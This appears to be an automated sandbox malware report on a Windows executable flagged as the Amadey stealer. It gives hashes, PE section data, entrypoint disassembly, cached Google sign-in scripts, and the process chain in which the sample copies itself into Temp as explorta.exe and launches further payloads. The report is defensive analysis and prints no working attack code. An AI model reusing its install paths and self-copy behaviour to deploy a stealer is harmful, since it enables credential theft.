                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.eIcQTVVx-II.es5.O/ck=boq-identity.AccountsSignInUi.abUGhSwZr5E.L.B1.O/am=PsAiOnEsAGLEeeADFAVCBgAAAAAAAAAArQFmBg/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,VwDzFe,YHI3We,YTxL4,YgOFye,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,f8Gu1e,hc6Ubd,iAskyc,iCBEqb,inNHtf,lsjVmc,ltDFwf,lwddkf,mvkUhe,n73qwf,nKuFpb,njlZCf,oLggrd,pxq3x,q0xTif,qPYxq,qPfo0c,qmdT9,rmumx,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,w9hDv,ws9Tlc,xBaz7b,xQtZb,xiZRqc,yRXbo,ywOR5c,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zu7j8,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFktUL8CS9ma2bFQwiLvYX2iyBOiw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:NoODMc;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=wg1P6b"
                                                                                                                                                                                                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.qMa=_.y("wg1P6b",[_.tx,_.El,_.Kl]);._.k("wg1P6b");.var m1a=function(a,b){b=b||_.Ja;for(var c=0,d=a.length,e;c<d;){var f=c+(d-c>>>1);var h=b(0,a[f]);0<h?c=f+1:(d=f,e=!h)}return e?c:-c-1},n1a=function(a,b){for(;b=b.previousSibling;)if(b==a)return-1;return 1},o1a=function(a,b){var c=a.parentNode;if(c==b)return-1;for(;b.parentNode!=c;)b=b.parentNode;return n1a(b,a)},p1a=function(a,b){if(a==b)return 0;if(a.compareDocumentPosition)return a.compareDocumentPosition(b)&2?1:-1;if(_.xg&&!(9<=Number(_.Eg))){if(9==a.nodeType)return-1;if(9==b.nodeType)return 1}if("sourceIndex"in.a||a.parentNode&&"sourceIndex"in a.parentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a.parentNode,f=b.parentNode;return e==f?n1a(a,b):!c&&_.hh(e,b)?-1*o1a(a,b):!d&&_.hh(f,a)?o1a(b,a):(c?a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:f.sourceIndex)}d=_.Vg(a);c=d.create

                                                                                                                                                                                                                                        Chrome Cache Entry: 269

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):52
                                                                                                                                                                                                                                        Entropy (8bit):4.542000661265563
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:yVkxzNDrMKcwVbF7KnZ:yVkxtkwVbF7KZ
                                                                                                                                                                                                                                        MD5:B3B89B9C275343BC6798E3A83564FDDB
                                                                                                                                                                                                                                        SHA1:32367475C527C3F5E5DB0BF42C348816FF4D157B
                                                                                                                                                                                                                                        SHA-256:900FB968F7FD9EA55F600AC9002A89E56AB56597DA7BDE04DEAAE6CC77AEB276
                                                                                                                                                                                                                                        SHA-512:ADB6938104E802B0936630B216CDE732F21ECA6E60E7A31D1B9C8FF52B5A66A712A7ECDE3F8ED4915D15C0A71C33A9788060E1E22999094C39020A1F8C636874
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                                                                                                                                                                                                                                        Preview:CiUKDQ0ZARP6GgQIVhgCIAEKCw3oIX6GGgQISxgCCgcN05ioBxoA

                                                                                                                                                                                                                                        Chrome Cache Entry: 270

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2362)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):220329
                                                                                                                                                                                                                                        Entropy (8bit):5.4443770705809635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:4btvBkNQB0w3NSOm3Rt9whvd6Ptfk/7aNyHD9KhLh:A0a0wNmBwK67cyj4hLh
                                                                                                                                                                                                                                        MD5:4441DDED9C24D3329776DD10688D12A8
                                                                                                                                                                                                                                        SHA1:07FF661EB06DDD8858DA4B7AEE259597346D4881
                                                                                                                                                                                                                                        SHA-256:58D7D9D54FF03332C13E22B4471FA7FD3834E070934CB969AE3DEBCB05DEF767
                                                                                                                                                                                                                                        SHA-512:B4F891DB471F20287A21E6482B4E3C7A9D41422DCBF5F2DC08482C61FEC6D565279CA8DA3F7ABD944B5AD226C957CB10F4395760071B3A5DD030F635F3FA5C79
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.eIcQTVVx-II.es5.O/am=PsAiOnEsAGLEeeADFAVCBgAAAAAAAAAArQFmBg/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlFanHGHzypIF4CDunCjsiQhMN3SxQ/m=_b,_tp"
                                                                                                                                                                                                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x3a22c03e, 0x800b1c4, 0x3e079c46, 0x10814500, 0x6, 0x0, 0x201ad000, 0x199, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.. Names of events that are special to jsaction. These are not all. event types that are legal to use in either HTML or the addEvent(). API, but these are the ones that are treated specially. All other. DOM events can be used in either addEvent() or in the value of the. jsaction attribute. Beware of browser specific events or events. that don't bubble though: If they are not mentioned he

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.944555942207053
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5:169d873778a229bcb4f010f87930cb28
                                                                                                                                                                                                                                        SHA1:15d928181a3abe9fc84d21454246676baad444a8
                                                                                                                                                                                                                                        SHA256:f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449
                                                                                                                                                                                                                                        SHA512:42630f7e98502c97806a4f241598dba61298d1874bffc7baf1bea34c3950861a182daf6798f4834b4d2865238569379a3bfa796dee953224fc29e712831170c4
                                                                                                                                                                                                                                        SSDEEP:49152:13/bnTrRlJqN+zVjKQVO3LNjmd6P0uqVs:1jnTrrJqY5ORjSieG
                                                                                                                                                                                                                                        TLSH:3F95338C6F27FA65CC04727F225F5DE4AEAE11D048D9C26B050B989BCB2B72C975E074
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L..

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Entrypoint:0x8bf000
                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x66264F79 [Mon Apr 22 11:52:25 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        jmp 00007F1228D4C8EAh
                                                                                                                                                                                                                                        clts
                                                                                                                                                                                                                                        sbb eax, 00000000h
                                                                                                                                                                                                                                        add cl, ch
                                                                                                                                                                                                                                        add byte ptr [eax], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dl
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edx], al
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], cl
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        or byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], cl
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edi], bl
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edi], al
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edi], bh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x680560x6a.idata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000x1e0.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4bda5c0x10wqkjverv
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x4bda0c0x18wqkjverv
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        0x10000x660000x2de0048612ce06c3abdffef35d7ba67cf5016False0.9904153184604905data7.923021973448171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .rsrc0x670000x1e00x200b8e170954f2b442e0b2c8aa424296bb7False0.580078125data4.531364606348125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .idata 0x680000x10000x200fa73ae0289558bc65b1fbb9df747dcc7False0.1484375data1.0302962761524366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        0x690000x2b40000x2003b95f3b30b02950fac7c26f7dd1b02d9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        wqkjverv0x31d0000x1a10000x1a0c0041d1f1c5d9197b0b2b6a81472a604248False0.9948664563962207data7.95472970828884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        wmthiooa0x4be0000x10000x6008bf2a38b8e7543f2cd5f35a89cd98db2False0.580078125data5.030197493070361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .taggant0x4bf0000x30000x2200c71315961e1b9d7eccf17867531720c6False0.06364889705882353DOS executable (COM)0.7826917576299937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_MANIFEST0x4bda6c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        kernel32.dlllstrcpy

                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:21:33:56
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                        Imagebase:0xb40000
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5 hash:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1986544625.0000000005350000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2026672887.0000000000B41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:21:33:59
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
                                                                                                                                                                                                                                        Imagebase:0x590000
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5 hash:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2019740253.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:21:34:00
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        Imagebase:0x590000
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5 hash:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2026683858.0000000005140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2067162566.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:21:34:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
                                                                                                                                                                                                                                        Imagebase:0xd0000
                                                                                                                                                                                                                                        File size:1'166'336 bytes
                                                                                                                                                                                                                                        MD5 hash:81A8F98229FF9CD694A2CB7389D22EF8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:21:34:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:21:34:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:21:34:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:21:34:09
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
